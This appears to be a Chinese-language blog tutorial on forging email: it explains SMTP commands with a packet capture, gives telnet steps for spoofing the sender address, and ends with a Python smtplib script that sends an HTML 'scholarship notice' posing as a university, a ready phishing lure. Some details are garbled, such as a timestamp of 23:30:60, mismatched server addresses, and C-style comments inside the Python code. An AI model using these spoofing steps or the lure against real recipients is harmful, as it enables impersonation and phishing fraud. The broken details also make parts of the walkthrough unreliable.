如何发送伪造的电子邮件
今天邮箱里收到了一份钓鱼邮件,幸好没有打开,于是动起了实现一把的冲动。
最近在看有关协议分析的资料,其中谈到了邮件传输协议(SMTP)的工作原理,深受感触。之后在网上又搜索了一些相关的资料,大概的整理了一下,希望对大家有帮助,有不对的地方请批评指正。
共分为三个阶段:1、建立连接2、数据传输3、连接关闭
首先在建立连接阶段我不用再罗嗦,主要就是TCP的三次握手。而问题就出现在第二个阶段(数据传输)在此过程中可以人为控制。邮件在传输的时候,我个人认为是通过五条命令来实现(有的资料上说的是其中三条命令)的分别是:
Helo
mail from:
rcpt to:
data
注:(这五条命令是内嵌在程序中自动完成,对用户来说是透明的。比如OUTLOOK、foxmail等程序)后面我会具体说明如何使用这些命令。
五条命令的含义:
Helo 表示与服务器内处理邮件的进程开始“通话”
mail from: 表明信息的来源地址,也就是要伪造的地址
rcpt to: 邮件接收者的地址
data 邮件的具体内容
下面是一个通过FOXMAIL程序发送邮件并进行抓包的分析(作了适当的修改):
172.17.1.1是邮件服务器地址,域名是abc.cn
| Source |
Destiination |
Protocol |
Info |
| 172.17.1.1 |
192.168.0.1 |
SMTP |
RESPONSE:220 abc.cn ESMTP sendmail 7.14.2/7.14.2; Thu, 22 may 2010 23:30:60 +0800 (CST) |
| 192.168.0.1 |
172.17.1.1 |
SMTP |
Command: HELO abc.cn |
| 172.17.1.1 |
192.168.0.1 |
SMTP |
Response: 250 abc.cn Hello [172.17.1.1],pleased to meet you |
| 192.168.0.1 |
172.17.1.1 |
SMTP |
Command: MAIL FROM: |
| 172.17.1.1 |
192.168.0.1 |
SMTP |
Response: 250 2.1.0 |
| 192.168.0.1 |
172.17.0.1 |
SMTP |
Command: RCPT TO: |
| 172.17.0.1 |
192.168.0.1 |
SMTP |
Response: 250 2.1.0 |
| 192.168.0.1 |
172.17.0.1 |
SMTP |
Command:DATA |
| 172.17.0.1 |
192.168.0.1 |
SMTP |
Response: 354 Enter mail,end with “.”on a line by itself |
| 192.168.0.1 |
172.17.0.1 |
SMTP |
Message Body |
| 172.17.0.1 |
192.168.0.1 |
SMTP |
Response: 221 2.0.0 ab.cn closing connection |
220 abc.cn SMTP sendmail 7.14.2/7.14.2; Thu, 22 may 2010 23:30:60 +0800 (CST)
为了体现所发邮件真实可性,注意上面加下划线的部分。需要在data中要包含from(伪造的邮件地址)、to(邮件的接收者地址)、subject(邮件的主题)、date(时间)这几个关键字。也就是我们在邮件中看到的“完整邮件头”下面是一个事例:
From: "admin"
To: [email protected] (邮件接收者的地址)
Subject: mail test (邮件的主题)
Date: Fri, 16 May 2010 12:45:39 +0800 (邮件的时间信息)
在我们了解了SMTP后,现在开始描述实现过程
第一步 进入字符模式,windows下是DOS:
c:\telnet 172.17.1.1 25
注意:登录的是25端口,
登录成功后邮件服务器会反馈一个信息“RESPONSE:220 abc.cn ESMTP sendmail 8.14.2/8.14.2; Thu, 22 may 2010 23:30:60 +0800 (CST)”
HELO abc.cn (想要伪造邮件的地址域名,比如SINA邮箱:sina.com.cn)
系统会反馈一个信息“Response: 250 abc.cn Hello [172.17.1.1],pleased to meet you”表示邮件系统认可
MAIL FROM :[email protected] (不能缺少“:”号,下面同样,邮件发送者的地址)
系统反馈信息“Response: 250 2.1.0
DATA 回车
(开始输入邮件正文,完成后一定要“回车”之后输入“.”号)
. (注意是英文状态下的“.”号,表示邮件输入完毕,最后再“回车”)
QUIT (邮件内容输入完成,退出)
系统反馈信息“Response: 221 2.0.0 ab.cn closing connection”
import smtplib
import email.mime.text
msg = email.mime.text.MIMEText("""
奖学金通知
同学,请速前往
奖学金领取
领取你的奖学金。
""",'html','utf-8')
msg['Subject'] = '奖学金通知'
msg['From'] = u'XX大学' //发送方,可以自己编辑
msg['To'] = '[email protected]'//收件人
try:
smtp = smtplib.SMTP()
smtp.connect('smtp.xx.xx.cn', '25')//smtp服务器链接
smtp.login('***username***','***password***')
smtp.sendmail('***username***',
'[email protected]', msg.as_string())
smtp.quit()
print('Sucess!')
except Exception as e:
print(e)